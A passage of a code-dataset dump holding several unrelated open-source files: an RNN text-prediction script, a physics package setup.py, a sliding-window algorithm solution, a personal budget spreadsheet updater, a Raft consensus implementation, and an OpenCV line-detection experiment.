return SmallConfig()\n elif model_option == \"medium\":\n return MediumConfig()\n elif model_option == \"large\":\n return LargeConfig()\n else:\n raise ValueError(\"Invalid model: %s\", model_option)\n\n\ndef main():\n # --data_path=/tmp/simple-examples/data/ --model small\n data_path = FilePath.data_path\n model_option = Config.model_option\n if not data_path:\n raise ValueError(\"Must set --data_path to PTB data directory\")\n\n out_dir = 'models'\n checkpoint_dir = os.path.join(out_dir, \"checkpoints\")\n\n raw_data = data_helpers.raw_data(data_path)\n train_data, valid_data, test_data, vocabulary = raw_data\n\n config = get_config(model_option)\n eval_config = get_config(model_option)\n eval_config.batch_size = 1\n # eval_config.num_steps = 1\n\n # sentence = 'Chảo Inox chống dính Withford-MỸ GPP03-FF28'\n # sentence = 'Chảo tráng men Natural'\n # sentence = 'Ốp lưng Spigen iPhone 6/ 6S Plus Case Neo Hybrid Gunmetal SGP11664'\n # sentence = 'Ốp lưng Spigen iPhone 6/ 6S Plus Case Neo Hybrid'\n # sentence = 'Ốp lưng Spigen iPhone 6/ 6S'\n # sentence = 'Ốp lưng Spigen Galaxy S6'\n # sentence = 'Saller: Chào em! Chị có thể giúp gì cho em? '\n # sentence = 'Mary: Chị ơi! Em có thể mặc thử được không ạ?Saller:'\n # sentence = 'Bạn khỏe không? '\n # sentence = 'Bạn khỏe'\n # sentence = 'Anh khỏe không? '\n # sentence = 'Chị khỏe không? '\n sentence = 'Chị ăn cơm chưa? '\n predict_data = data_helpers.predict_data(sentence, vocabulary, config.num_steps)\n eval_config.num_steps = len(predict_data[0])\n\n with tf.Graph().as_default(), tf.Session() as session:\n initializer = tf.random_uniform_initializer(-config.init_scale,\n config.init_scale)\n\n with tf.variable_scope(\"model\", reuse=None, initializer=initializer):\n m = PTBModel(is_training=True, config=config)\n with tf.variable_scope(\"model\", reuse=True, initializer=initializer):\n mvalid = PTBModel(is_training=False, config=config)\n mtest = PTBModel(is_training=False, config=eval_config)\n mpredict = PTBModel(is_training=False, config=eval_config)\n\n # tf.initialize_all_variables().run()\n saver = tf.train.Saver(tf.all_variables(), max_to_keep=1)\n ckpt = tf.train.get_checkpoint_state(checkpoint_dir)\n if ckpt and ckpt.model_checkpoint_path:\n model_checkpoint_path_arr = ckpt.model_checkpoint_path.split(\"/\")\n abs_model_checkpoint_path = checkpoint_dir + '/' + model_checkpoint_path_arr[-1]\n saver.restore(session, abs_model_checkpoint_path)\n\n # for i in range(config.max_max_epoch):\n # lr_decay = config.lr_decay ** max(i - config.max_epoch, 0.0)\n # m.assign_lr(session, config.learning_rate * lr_decay)\n #\n # print(\"Epoch: %d Learning rate: %.3f\" % (i + 1, session.run(m.lr)))\n # train_perplexity = run_epoch(session, m, train_data, m.train_op,\n # verbose=True, vocabulary=vocabulary)\n # print(\"Epoch: %d Train Perplexity: %.3f\" % (i + 1, train_perplexity))\n # valid_perplexity = run_epoch(session, mvalid, valid_data, tf.no_op(), vocabulary=vocabulary)\n # print(\"Epoch: %d Valid Perplexity: %.3f\" % (i + 1, valid_perplexity))\n #\n # path = saver.save(session, checkpoint_prefix, global_step=i)\n\n gen_words = run_epoch(session, mpredict, predict_data, tf.no_op(), vocabulary=vocabulary)\n print('=' * 50)\n print('=' * 50)\n print(sentence)\n print(' '.join(gen_words))\n\n\nif __name__ == \"__main__\":\n 
main()\n","repo_name":"paduvi/machinelearning","sub_path":"rnn_test/rnn_predict.py","file_name":"rnn_predict.py","file_ext":"py","file_size_in_byte":5786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28284371186","text":"# This file is part of gLund by S. Carrazza and F. A. Dreyer\n\nfrom __future__ import print_function\nimport sys\nfrom setuptools import setup, find_packages\n\nif sys.version_info < (3,6):\n print(\"cyclejet requires Python 3.6 or later\", file=sys.stderr)\n sys.exit(1)\n\nwith open('README.md') as f:\n long_desc = f.read()\n\nsetup(name= \"cyclejet\",\n version = '0.0.1',\n description = \"CycleGAN models for jet substructure \",\n author = \"F. Dreyer, S. Carrazza\",\n author_email = \"frederic.dreyer@cern.ch, stefano.carrazza@cern.ch\",\n url=\"https://gitlab.cern.ch/JetsGame/cyclegan\",\n long_description = long_desc,\n entry_points = {'console_scripts':\n ['cyclejet = cyclejet.scripts.run:main',]},\n package_dir = {'': 'src'},\n packages = find_packages('src'),\n zip_safe = False,\n classifiers=[\n 'Operating System :: Unix',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.5',\n 'Topic :: Scientific/Engineering',\n 'Topic :: Scientific/Engineering :: Physics',\n ],\n )\n","repo_name":"JetsGame/CycleJet","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"13511012330","text":"class Solution:\n def condition(self, s, t):\n for key in t.keys():\n if s.get(key, 0) < t[key]:\n return False\n return True\n \n def minWindow(self, s: str, t: str) -> str:\n if len(t) > len(s):\n return \"\"\n \n target = {}\n currWindow = {}\n for i in t:\n target[i] = 1 + target.get(i, 0)\n l, r = 0, 0\n fin_min = len(s)\n res = \"\"\n while r < len(s):\n currWindow[s[r]] = 1 + currWindow.get(s[r], 0)\n while (self.condition(currWindow, target)):\n if fin_min >= (r - l + 1):\n res = s[l:r+1]\n fin_min = r - l + 1\n currWindow[s[l]] -= 1\n l += 1\n r += 1\n return res","repo_name":"Sudheeradh/neetcode-solutions-old","sub_path":"Sliding Window/Minimum Window Substring.py","file_name":"Minimum Window Substring.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29082270845","text":"__author__ = \"Mark Sattolo\"\n__author_email__ = \"epistemik@gmail.com\"\n__created__ = \"2019-04-13\"\n__updated__ = \"2022-01-04\"\n\nfrom updateAssets import ASSETS_DATA, ASSET_COLS\nfrom updateBudget import *\n\nbase_run_file = get_base_filename(__file__)\n\nBALANCE_DATA = {\n # first data row in the sheet\n BASE_ROW : 4 ,\n # first variable year in google sheet\n BASE_YEAR : 2008 ,\n # NO QUARTER DATA in BALANCE SHEET\n # number of rows to same quarter in adjacent year, NOT INCLUDING header rows\n YEAR_SPAN : 1 ,\n # number of rows to adjacent quarter in the same year\n QTR_SPAN : 0 ,\n # number of years between header rows\n HDR_SPAN : 8\n}\n\nBASE_TOTAL_WORTH_ROW:int = 33\nBASE_MTHLY_ROW:int = BASE_TOTAL_WORTH_ROW - 1\n\n# path to the accounts in the Gnucash file\nBALANCE_ACCTS = {\n HOUSE : [FAM, HOUSE] ,\n LIAB : [FAM, LIAB] ,\n TRUST : [TRUST] ,\n CHAL : [CHAL] , # chalet\n FAM : [FAM] , # family\n INVEST : [FAM, INVEST] ,\n LIQ : [FAM, LIQ] , # Liquid\n PM : [FAM, PM] , # Precious Metals\n REW : [FAM, REW] , # Rewards\n LOAN : 
[FAM, LOAN]\n}\n\n# column index in the Google sheets\nBAL_MTHLY_COLS = {\n LIAB : {YR: 'U', MTH: 'L'},\n DATE : 'E' ,\n TIME : 'F' ,\n TODAY: 'C' ,\n FAM : 'K' ,\n MTH : 'I'\n}\n\n# cell locations in the Google file\nBAL_TODAY_RANGES = {\n HOUSE : BASE_TOTAL_WORTH_ROW + 6 ,\n LIAB : BASE_TOTAL_WORTH_ROW + 8 ,\n TRUST : BASE_TOTAL_WORTH_ROW + 1 ,\n CHAL : BASE_TOTAL_WORTH_ROW + 2 ,\n FAM : BASE_TOTAL_WORTH_ROW + 7\n}\n\n\nclass UpdateBalance(UpdateBudget):\n \"\"\"Take data from a Gnucash file and update a Balance tab of my Google Budget-Quarterly document.\"\"\"\n def __init__(self, args:list, p_logname:str):\n super().__init__(args, p_logname)\n\n # Google sheet to update\n self.dest = BAL_2_SHEET\n if '1' in self.mode:\n self.dest = BAL_1_SHEET\n self._lgr.debug(F\"dest = {self.dest}\")\n\n self._gnc_session = None\n\n # NO saved gnc data for Balance\n self.save_gnc = False\n\n def get_balance(self, bal_path:list, p_date:date) -> Decimal:\n return self._gnc_session.get_total_balance(bal_path, p_date)\n\n def fill_today(self):\n \"\"\"Get Balance data for TODAY: LIABS, House, FAMILY, CHALET, TRUST.\"\"\"\n self._lgr.debug(get_current_time())\n # calls using 'today' ARE NOT off by one day??\n tdate = now_dt - ONE_DAY\n asset_sums = {}\n for item in BALANCE_ACCTS:\n acct_sum = self.get_balance(BALANCE_ACCTS[item], tdate)\n if item == TRUST:\n self.fill_google_cell(BAL_MTHLY_COLS[TODAY], BAL_TODAY_RANGES[item], acct_sum)\n elif item == CHAL:\n self.fill_google_cell(BAL_MTHLY_COLS[TODAY], BAL_TODAY_RANGES[item], acct_sum)\n elif item == HOUSE:\n self.fill_google_cell(BAL_MTHLY_COLS[TODAY], BAL_TODAY_RANGES[item], acct_sum)\n elif item == LIAB:\n self.fill_google_cell(BAL_MTHLY_COLS[TODAY], BAL_TODAY_RANGES[item], acct_sum)\n else:\n # need family assets EXCLUDING the previous items, which are reported separately\n asset_sums[item] = acct_sum\n\n # report the family amount as the sum of the individual accounts\n family_sum = \"= \" + str(asset_sums[INVEST]) + \" + \" + str(asset_sums[LIQ]) + \" + \" + str(asset_sums[LOAN]) + \" + \" + str(asset_sums[REW]) \\\n + \" + \" + str(asset_sums[PM])\n self._lgr.debug(F\"Adjusted assets on {now_dt} = '{family_sum}'\")\n self.fill_google_cell(BAL_MTHLY_COLS[TODAY], BAL_TODAY_RANGES[FAM], family_sum)\n\n # TODO: fill in reference for Assets for div-3 months in K row\n def fill_current_year(self):\n \"\"\"\n CURRENT YEAR: fill_today() AND: LIABS for ALL completed month_ends;\n FAMILY for ALL 'non-div-3' completed month_ends in year\n \"\"\"\n self.fill_today()\n self._lgr.debug(get_current_time())\n\n for i in range(now_dt.month - 1):\n month_end = date(now_dt.year, i + 2, 1) - ONE_DAY\n self._lgr.debug(F\"month_end = {month_end}\")\n\n row = BASE_MTHLY_ROW + month_end.month\n # fill LIABS\n liab_sum = self.get_balance(BALANCE_ACCTS[LIAB], month_end)\n self.fill_google_cell(BAL_MTHLY_COLS[LIAB][MTH], row, liab_sum)\n\n # fill ASSETS for months NOT covered by the Assets sheet\n if month_end.month % 3 != 0:\n acct_sum = self.get_balance(BALANCE_ACCTS[FAM], month_end)\n adjusted_assets = acct_sum - liab_sum\n self._lgr.debug(F\"Adjusted assets on {month_end} = {adjusted_assets.to_eng_string()}\")\n self.fill_google_cell(BAL_MTHLY_COLS[FAM], row, adjusted_assets)\n else:\n self._lgr.debug(\"Update reference to Assets sheet for Mar, June, Sep or Dec\")\n # have to update the CELL REFERENCE to current year/qtr ASSETS\n year_row = ASSETS_DATA[BASE_ROW] \\\n + year_span( now_dt.year, ASSETS_DATA[BASE_YEAR], ASSETS_DATA[YEAR_SPAN], ASSETS_DATA[HDR_SPAN],\n 
self._lgr )\n int_qtr = (month_end.month // 3) - 1\n self._lgr.debug(F\"int_qtr = {int_qtr}\")\n dest_row = year_row + (int_qtr * ASSETS_DATA.get(QTR_SPAN))\n val_num = '1' if '1' in self.dest else '2'\n value = \"='Assets \" + val_num + \"'!\" + ASSET_COLS[TOTAL] + str(dest_row)\n self.fill_google_cell(BAL_MTHLY_COLS[FAM], row, value)\n\n # fill DATE for month column\n self.fill_google_cell(BAL_MTHLY_COLS[MTH], row, str(month_end))\n\n def fill_previous_year(self):\n \"\"\"\n PREVIOUS YEAR: LIABS for ALL NON-completed months;\n FAMILY assets for ALL 'non-div-3' NON-completed months in year\n \"\"\"\n self._lgr.debug(get_current_time())\n\n year = now_dt.year - 1\n for mth in range(12 - now_dt.month):\n dte = date(year, mth + now_dt.month + 1, 1) - ONE_DAY\n self._lgr.debug(F\"date = {dte}\")\n\n row = BASE_MTHLY_ROW + dte.month\n # fill LIABS\n liab_sum = self.get_balance(BALANCE_ACCTS[LIAB], dte)\n self.fill_google_cell(BAL_MTHLY_COLS[LIAB][MTH], row, liab_sum)\n\n # fill ASSETS for months NOT covered by the Assets sheet\n if dte.month % 3 != 0:\n acct_sum = self.get_balance(BALANCE_ACCTS[FAM], dte)\n adjusted_assets = acct_sum - liab_sum\n self._lgr.debug(F\"Adjusted assets on {dte} = ${adjusted_assets.to_eng_string()}\")\n self.fill_google_cell(BAL_MTHLY_COLS[FAM], row, adjusted_assets)\n\n # fill the date in Month column\n self.fill_google_cell(BAL_MTHLY_COLS[MTH], row, str(dte))\n\n year_end = date(year, 12, 31)\n row = BASE_MTHLY_ROW + 12\n # fill the year-end date in Month column\n self.fill_google_cell(BAL_MTHLY_COLS[MTH], row, str(year_end))\n\n # LIABS entry for year end\n liab_sum = self.get_balance(BALANCE_ACCTS[LIAB], year_end)\n # month column\n self.fill_google_cell(BAL_MTHLY_COLS[LIAB][MTH], row, liab_sum)\n # year column\n self.fill_year_end_liabs(year)\n\n def fill_year_end_liabs(self, year:int):\n year_end = date(year, 12, 31)\n self._lgr.debug(F\"year_end = {year_end}\")\n\n # fill LIABS\n liab_sum = self.get_balance(BALANCE_ACCTS[LIAB], year_end)\n yr_span = year_span( year, BALANCE_DATA[BASE_YEAR], BALANCE_DATA[YEAR_SPAN], BALANCE_DATA[HDR_SPAN] )\n self.fill_google_cell( BAL_MTHLY_COLS[LIAB][YR], BALANCE_DATA[BASE_ROW] + yr_span, str(liab_sum) )\n\n def fill_gnucash_data(self, p_session:GnucashSession, p_qtr:int, p_year:str, data_qtr:dict):\n self._gnc_session = p_session\n\n def fill_google_cell(self, p_col:str, p_row:int, p_val:FILL_CELL_VAL):\n self._ggl_update.fill_cell(self.dest, p_col, p_row, p_val)\n\n def fill_google_data(self, p_years:list):\n \"\"\"\n for each of the specified years:\n IF CURRENT YEAR: TODAY & LIABS for ALL completed months; FAMILY for ALL non-3 completed months in year\n Balance data for TODAY: LIABS, House, FAMILY, XCHALET, TRUST\n IF PREVIOUS YEAR: LIABS for ALL NON-completed months; FAMILY for ALL non-3 NON-completed months in year\n \"\"\"\n self._lgr.info(F\"timespan = {p_years}\\n\")\n\n for yr in p_years:\n year = get_int_year( yr, BALANCE_DATA[BASE_YEAR] )\n if year == now_dt.year:\n self.fill_current_year()\n elif now_dt.year - 1 == year:\n self.fill_previous_year()\n else:\n self.fill_year_end_liabs(year)\n\n# END class UpdateBalance\n\n\ndef update_balance_main(args:list) -> dict:\n balance = UpdateBalance(args, base_run_file)\n return balance.go()\n\n\nif __name__ == \"__main__\":\n update_balance_main(argv[1:])\n 
exit()\n","repo_name":"EpistemikPython/UpdateBudgetQtrly","sub_path":"updateBalance.py","file_name":"updateBalance.py","file_ext":"py","file_size_in_byte":9151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23177742534","text":"import asyncio\nimport random\n\nimport logging\nfrom .log import Log\nfrom .timer import Timer\n\n\nclass BaseState(object):\n\n def __init__(self, server):\n self.server = server\n self.log = Log()\n self.leader = None\n # latest term server has seen (initialized to 0 increases monotonically)\n self.term = 0\n # candidate_id that received vote in current term (or None)\n self.voted_for = None\n\n def set_leader(self, new_leader):\n self.leader = new_leader\n\n def on_receive_request_vote(self, data):\n \"\"\"RequestVote RPC — invoked by Candidate to gather votes\n Arguments:\n term — candidate’s term\n candidate_id — candidate requesting vote\n last_log_index — index of candidate’s last log entry\n last_log_term — term of candidate’s last log entry\n\n Results:\n term — for candidate to update itself\n vote_granted — True means candidate received vote\n\n Receiver implementation:\n 1. Reply False if term < self term\n 2. If voted_for is None or candidateId ????,\n and candidate’s log is at least as up-to-date as receiver’s log,\n grant vote\n \"\"\"\n\n def on_receive_request_vote_response(self, data):\n \"\"\"RequestVote RPC response — description above\"\"\"\n\n def on_receive_append_entries(self, data):\n \"\"\"AppendEntries RPC — replicate log entries / heartbeat\n Arguments:\n term — leader’s term\n leader_id — so follower can redirect clients\n prev_log_index — index of log entry immediately preceding new ones\n prev_log_term — term of prev_log_index entry\n entries[] — log entries to store (empty for heartbeat)\n commit_index — leader’s commit_index\n\n Results:\n term — for leader to update itself\n success — True if follower contained entry matching prev_log_index\n and prev_log_term\n\n Receiver implementation:\n 1. Reply False if term < self term\n 2. Reply False if log entry term at prev_log_index doesn't match\n prev_log_term\n 3. If an existing entry conflicts with a new one, delete the entry\n and following entries\n 4. Append any new entries not already in the log\n 5. 
If leader_commit > commit_index, set commit_index =\n min(leader_commit, index of last new entry)\n \"\"\"\n\n def on_receive_append_entries_response(self, data):\n \"\"\"AppendEntries RPC response — description above\"\"\"\n\n def request_handler(self, data):\n \"\"\"Dynamically determine the request handler by request type\"\"\"\n func = getattr(self, 'on_receive_{}'.format(data['type']))\n # logging.debug('%s handling %s', func, data)\n func(data)\n\n\nclass Follower(BaseState):\n \"\"\"Raft Follower\n\n — Respond to RPCs from candidates and leaders\n — If election timeout elapses without receiving AppendEntries RPC from\n current leader or granting vote to candidate: convert to candidate\n \"\"\"\n\n def __init__(self, server):\n super().__init__(server)\n self.election_timer = Timer(self.election_interval, self.start_election,\n self.server.loop)\n\n def start(self):\n self.election_timer.start()\n\n def stop(self):\n self.election_timer.stop()\n\n @property\n def election_interval(self):\n return random.uniform(150, 300)\n\n def on_receive_append_entries(self, data):\n self.set_leader(data['leader_id'])\n\n # Reply False if log does not contain an entry at pre_log_idx\n # whose term matches prev_log_term\n pre_log_idx = data['prev_log_index']\n try:\n if (pre_log_idx and pre_log_idx > self.log.last_log_index) \\\n or (pre_log_idx and self.log[pre_log_idx]['term'] !=\n data['prev_log_term']):\n response = {\n 'type': 'append_entries_response',\n 'term': self.term,\n 'success': False,\n 'request_id': data['request_id']\n }\n asyncio.ensure_future(\n self.server.send(response, data['sender']),\n loop=self.server.loop)\n return\n except IndexError:\n pass\n\n # If an existing entry conflicts with a new one (same index but\n # different terms), delete the existing entry and all that follow it\n new_index = data['prev_log_index'] + 1\n try:\n if self.log[new_index]['term'] != data['term'] or (\n self.log.last_log_index != pre_log_idx\n ):\n self.log.erase_from(new_index)\n except IndexError:\n pass\n\n # It's always one entry for now\n self.log.add_entries(data['entries'])\n\n # Update commit index if necessary\n if self.log.commit_index < data['commit_index']:\n self.log.commit_index = min(data['commit_index'],\n self.log.last_log_index)\n\n # Return True since entry matching pre_log_idx and prev_log_term\n # was found\n response = {\n 'type': 'append_entries_response',\n 'term': self.term,\n 'success': True,\n 'last_log_index': self.log.last_log_index,\n 'request_id': data['request_id']\n }\n asyncio.ensure_future(self.server.send(response, data['sender']),\n loop=self.server.loop)\n\n self.election_timer.reset()\n\n def on_receive_request_vote(self, data):\n if self.voted_for is None and not data['type'].endswith('_response'):\n\n # If the logs have last entries with different terms,\n # then the log with the later term is more up-to-date.\n # If the logs end with the same term, then whichever log is longer\n # is more up-to-date.\n\n # Candidates' log has to be up-to-date\n if data['last_log_term'] != self.log.last_log_term:\n up_to_date = data['last_log_term'] > self.log.last_log_term\n else:\n up_to_date = data['last_log_index'] >= self.log.last_log_index\n\n if up_to_date:\n self.voted_for = data['candidate_id']\n\n response = {\n 'type': 'request_vote_response',\n 'term': self.term,\n 'vote_granted': up_to_date\n }\n\n asyncio.ensure_future(self.server.send(response, data['sender']),\n loop=self.server.loop)\n\n def start_election(self):\n self.server.to_candidate()\n\n\nclass 
Candidate(BaseState):\n \"\"\"Raft Candidate\n — On conversion to candidate, start election:\n — Increment self term\n — Vote for self\n — Reset election timer\n — Send RequestVote RPCs to all other servers\n — If votes received from majority of servers: become leader\n — If AppendEntries RPC received from new leader: convert to follower\n — If election timeout elapses: start new election\n \"\"\"\n\n def __init__(self, server):\n super().__init__(server)\n self.election_timer = Timer(self.election_interval,\n self.server.to_follower,\n self.server.loop)\n self.vote_count = 0\n\n def start(self):\n \"\"\"Increment current term, vote for herself & send vote requests\"\"\"\n self.term += 1\n self.voted_for = self.server.id\n\n self.vote_count = 1\n self.request_vote()\n self.election_timer.start()\n\n def stop(self):\n self.election_timer.stop()\n\n def request_vote(self):\n \"\"\"RequestVote RPC — gather votes\n Arguments:\n term — candidate’s term\n candidate_id — candidate requesting vote\n last_log_index — index of candidate’s last log entry\n last_log_term — term of candidate’s last log entry\n \"\"\"\n data = {\n 'type': 'request_vote',\n 'term': self.term,\n 'candidate_id': self.server.id,\n 'last_log_index': self.log.last_log_index,\n 'last_log_term': self.log.last_log_term\n }\n if self.server.cluster_count > 1:\n self.server.broadcast(data)\n else:\n self.server.to_leader()\n\n def on_receive_request_vote_response(self, data):\n \"\"\"Receives response for vote request.\n If the vote was granted then check if we got majority and may\n becomeLeader\n \"\"\"\n if data.get('vote_granted'):\n self.vote_count += 1\n if self.server.is_majority(self.vote_count):\n self.server.to_leader()\n\n def on_receive_append_entries(self, data):\n \"\"\"If we discover a Leader with the same term — step down\"\"\"\n if self.term == data['term']:\n self.server.to_follower()\n response = {\n 'type': 'append_entries_response',\n 'term': self.term,\n 'success': True,\n 'last_log_index': self.log.last_log_index,\n 'request_id': data['request_id']\n }\n asyncio.ensure_future(self.server.send(response, data['sender']),\n loop=self.server.loop)\n\n self.election_timer.reset()\n\n @property\n def election_interval(self):\n return random.uniform(150, 300)\n\n\nclass Leader(BaseState):\n \"\"\"Raft Leader\n Upon election: send initial empty AppendEntries RPCs (heartbeat) to\n each server; repeat during idle periods to prevent election timeouts\n\n — If command received from client: append entry to local log, respond after\n entry applied to state machine\n - If last log index ≥ next_index for a follower: send AppendEntries RPC with\n log entries starting at next_index\n — If successful: update next_index and match_index for follower\n — If AppendEntries fails because of log inconsistency:\n decrement next_index and retry\n — If there exists an N such that N > commit_index, a majority of\n match_index[i] ≥ N, and log[N].term == self term: set commit_index = N\n \"\"\"\n\n def __init__(self, server):\n super().__init__(server)\n self.heartbeat_interval = 50\n self.step_down_missed_heartbeats = 8\n self.heartbeat_timer = Timer(self.heartbeat_interval,\n self.heartbeat,\n self.server.loop)\n self.step_down_timer = Timer(\n self.step_down_missed_heartbeats * self.heartbeat_interval,\n self.step_down, self.server.loop)\n # monotonically increasing request id and response of each request\n self.request_id = 0\n self.response_map = {}\n\n def step_down(self):\n logging.warning('%s stepping down', self.server)\n 
self.server.to_follower()\n\n def start(self):\n self.init_log()\n self.heartbeat_timer.start()\n self.step_down_timer.start()\n\n def stop(self):\n self.heartbeat_timer.stop()\n self.step_down_timer.stop()\n\n def init_log(self):\n self.log.next_index = {\n follower: self.log.last_log_index + 1 for follower in\n self.server.peers\n }\n\n self.log.match_index = {\n follower: 0 for follower in self.server.peers\n }\n\n async def append_entries(self, destination=None):\n \"\"\"AppendEntries RPC — replicate log entries / heartbeat\n Args:\n destination — destination id\n\n Request params:\n term — leader’s term\n leader_id — so follower can redirect clients\n prev_log_index — index of log entry immediately preceding new ones\n prev_log_term — term of prev_log_index entry\n commit_index — leader’s commit_index\n\n entries[] — log entries to store (empty for heartbeat)\n \"\"\"\n # Send AppendEntries RPC to destination if specified or broadcast to\n # everyone\n for dest in destination and [destination] or self.server.peers:\n data = {\n 'type': 'append_entries',\n 'term': self.term,\n 'leader_id': self.server.id,\n 'commit_index': self.log.commit_index,\n 'request_id': self.request_id\n }\n # logging.debug('append_entries %s from %s', data, dest)\n next_index = self.log.next_index[dest]\n prev_index = next_index - 1\n\n if self.log.last_log_index >= next_index:\n data['entries'] = self.log[next_index:]\n else:\n data['entries'] = []\n\n data.update({\n 'prev_log_index': prev_index,\n 'prev_log_term': self.log[prev_index]['term'] if self.log\n and prev_index else 0\n })\n asyncio.ensure_future(self.server.send(data, dest),\n loop=self.server.loop)\n\n def on_receive_append_entries_response(self, data):\n sender_id = data['sender']\n # logging.debug('append_entries_response %s from %s', data, sender_id)\n\n # Count all unique responses per particular heartbeat interval\n # and step down via if leader doesn't get majority of\n # responses for heartbeats\n # import ipdb; ipdb.set_trace()\n if data['request_id'] in self.response_map:\n self.response_map[data['request_id']].add(sender_id)\n answered = len(self.response_map[data['request_id']])\n if self.server.is_majority(answered + 1):\n # logging.debug('leader %s step down reset', self.server.id)\n self.step_down_timer.reset()\n del self.response_map[data['request_id']]\n\n if not data['success']:\n self.log.next_index[sender_id] = \\\n max(self.log.next_index[sender_id] - 1, 1)\n else:\n self.log.next_index[sender_id] = data['last_log_index'] + 1\n self.log.match_index[sender_id] = data['last_log_index']\n self.update_commit_index()\n\n # Send AppendEntries RPC to continue updating fast-forward log\n # (data['success'] == False) or in case there are new entries to sync\n # (data['success'] == data['updated'] == True)\n if self.log.last_log_index >= self.log.next_index[sender_id]:\n host, port = sender_id.split(':')\n addr = (host.strip(), port.strip())\n asyncio.ensure_future(self.append_entries(destination=addr),\n loop=self.server.loop)\n\n def update_commit_index(self):\n committed_on_majority = 0\n for index in range(self.log.commit_index + 1,\n self.log.last_log_index + 1):\n committed_count = len([\n 1 for follower in self.log.match_index\n if self.log.match_index[follower] >= index\n ])\n\n # If index is matched on at least half + self for\n # current term — commit. 
This may cause commit failures upon restart\n            # with stale logs\n            is_current_term = self.log[index]['term'] == self.term\n            if self.server.is_majority(committed_count + 1) and is_current_term:\n                committed_on_majority = index\n            else:\n                break\n\n        if committed_on_majority > self.log.commit_index:\n            self.log.commit_index = committed_on_majority\n\n    def heartbeat(self):\n        self.request_id += 1\n        self.response_map[self.request_id] = set()\n        logging.debug('%s heart beating, request id: %s', self.server.id, self.request_id)\n        asyncio.ensure_future(self.append_entries(), loop=self.server.loop)\n","repo_name":"vitrun/pok","sub_path":"raft/raft/state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":16063,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"75430937960","text":"\nimport numpy as np\nimport cv2\n\nimg_original = cv2.imread('C:/fleshwoman/Object-detection/image/books.jpg')\n\nimg = img_original.copy()\n\n\n# 1. Image preprocessing\n## 1.1 Convert to grayscale and apply blur\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\nblur1 = cv2.GaussianBlur(gray, (5, 5), 0)\n# Preserves edges but is slow; picks up text well when the image quality is good\nblur2 = cv2.bilateralFilter(gray, 9, 75, 75)\n# src: input image\n# d: diameter of the pixel neighborhood used for filtering; when unavailable, it is derived from sigmaSpace.\n# sigmaColor: sigma in the color space; larger values increase the influence of neighboring pixels on the reference color.\n# sigmaSpace: controls the spatial sigma; larger values let more distant pixels influence each other. Ignored when d > 0, otherwise proportional to d.\n#\n\nblur3 = cv2.medianBlur(gray, 5)\n\n# blur = np.hstack([blur1, blur2, blur3])\n# cv2.namedWindow('blur', cv2.WINDOW_NORMAL)\n# cv2.imshow(\"blur\", blur)\n# cv2.waitKey(0)\n\n\n\n# 1.2. Apply thresholding\n# The code that looked most suitable based on checks in Threshoding.py\nthr7 = cv2.adaptiveThreshold(blur3, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 11, -2)\n# cv2.namedWindow('thr', cv2.WINDOW_NORMAL)\n# cv2.imshow(\"thr\", thr7)\n# cv2.waitKey(0)\n\n# closing or opening\nkernel = cv2.getStructuringElement(cv2.MORPH_RECT, (3, 3))\n# opened = cv2.morphologyEx(thr7, cv2.MORPH_OPEN, kernel)\nclosed = cv2.morphologyEx(thr7, cv2.MORPH_CLOSE, kernel)\n\n#oc = np.vstack([thr7, closed])\noc = closed\ncv2.namedWindow('oc', cv2.WINDOW_NORMAL)\ncv2.imshow(\"oc\", oc)\ncv2.waitKey(0)\n\n# 2. 
Edge detection\n# edges = cv2.Canny(blur, 5, 250)\n# cv2.namedWindow('edges', cv2.WINDOW_NORMAL)\n# cv2.imshow(\"edges\", edges)\n# cv2.waitKey(0)\n#\n# minLineLength: segments shorter than this length are not treated as lines.\nminLineLength = 100\n# maxLineGap: segments separated by more than this gap are treated as different lines.\nmaxLineGap = 10\nrho = 1\ntheta = np.pi/180\nthreshold = 200\n\n\n# Pass minLineLength/maxLineGap as keyword arguments: positionally they would\n# land in the unused 'lines' output slot of cv2.HoughLinesP\nlines = cv2.HoughLinesP(oc, 1, theta, threshold, minLineLength=minLineLength, maxLineGap=maxLineGap)\nlines1 = cv2.HoughLinesP(oc, 1, theta, threshold, minLineLength=100, maxLineGap=5)\nlines2 = cv2.HoughLinesP(oc, 1, theta, threshold, minLineLength=100, maxLineGap=maxLineGap)\nlines3 = cv2.HoughLinesP(oc, 1, theta, 150, minLineLength=100, maxLineGap=5)\n\nimg1 = img.copy()\nimg2 = img.copy()\nimg3 = img.copy()\n\n\nfor i in range(len(lines)):\n    for x1, y1, x2, y2 in lines[i]:\n        cv2.line(img, (x1, y1), (x2, y2), (0, 0, 255), 3)\n\nfor i in range(len(lines1)):\n    for x1, y1, x2, y2 in lines1[i]:\n        cv2.line(img1, (x1, y1), (x2, y2), (0, 0, 255), 3)\n\nfor i in range(len(lines2)):\n    for x1, y1, x2, y2 in lines2[i]:\n        cv2.line(img2, (x1, y1), (x2, y2), (0, 0, 255), 3)\n\nfor i in range(len(lines3)):\n    for x1, y1, x2, y2 in lines3[i]:\n        cv2.line(img3, (x1, y1), (x2, y2), (0, 0, 255), 3)\n\n\n\nrow1 = np.hstack([img, img1])\nrow2 = np.hstack([img2, img3])\nfin = np.vstack([row1, row2])\n\ncv2.namedWindow('fin', cv2.WINDOW_NORMAL)\ncv2.imshow('fin', fin)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n\n\n# minLineLength = 500\n# maxLineGap = 10\n# rho = 1\n# # np.pi/180: one-degree steps, so 180 (r, theta) pairs per pixel.\n# theta = np.pi/45\n# # Varies by image..\n# threshold = 100\n# lines = cv2.HoughLines(closed, 1, theta, threshold)\n#\n# for line in lines:\n#     for rho,theta in line:\n#         a = np.cos(theta)\n#         b = np.sin(theta)\n#         x0 = a*rho\n#         y0 